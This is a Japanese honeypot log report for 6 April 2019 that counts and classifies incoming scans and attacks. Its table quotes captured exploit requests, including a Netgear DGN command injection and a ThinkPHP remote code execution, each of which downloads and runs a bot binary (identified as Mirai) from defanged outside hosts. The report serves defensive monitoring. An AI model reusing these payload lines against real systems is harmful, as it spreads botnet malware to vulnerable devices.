BW-Potのログ分析 (2019/04/06)
本日の総アクセス件数は594件です。送信元IP数は77IPです。
"GET /" のような単なるアクセスと思われる通信が55IPから来ました。
内訳の多くは、日本リージョンに属するAWS上の4IPから、
計280回、UAがGo-http-clientの通信でした。
何かのテストでもしていたのだと思います。
Netgear DGN DSLモデムとルーターに関する攻撃においてwgetするファイルは、
404が返ってきました。
- hxxp://142.93.232[.]131/legion.mips
ThinkPHPに関する攻撃においてwgetするファイルは、まだ取得可能でした。
ハッシュ値は以下となります。
b2128d9757426f114b3ca718a6ad1c5850381077666ffb05703da95e20604b0b
VirusTotalで解析を行うとMiraiということでした。
件数 | 種別 | リクエスト |
359 | アクセス | GET / |
218 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
3 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
2 | Netgear DGN DSLモデムとルーターに関する攻撃 | GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20hxxp://142.93.232[.]131/legion.mips%20-O%20/var/tmp/legion.mips;%20chmod%20777%20/var/tmp/legion.mips;%20/var/tmp/legion.mips;%20rm%20-rf%20/var/tmp/legion.mips&curpath=/¤tsetting.htm=1 |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
1 | HIKVISION製の監視カメラの設定ファイルに関する調査 | GET /System/configurationFile/?auth=YWRtaW46MTEKYOBA |
1 | 不明 | GET /admin/connection/ |
1 | 不正中継の調査 | GET 5.188.210[.]101/echo.php |
1 | アクセス | GET /favicon.ico |
1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://love.thotiana[.]live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp |
1 | クローリング | GET /robots.txt |
1 | クローリング | HEAD /robots.txt |
1 | サイトの構成調査 | GET /sitemap.xml |
1 | Linksysの脆弱性に関する調査 | POST /tmUnblock.cgi |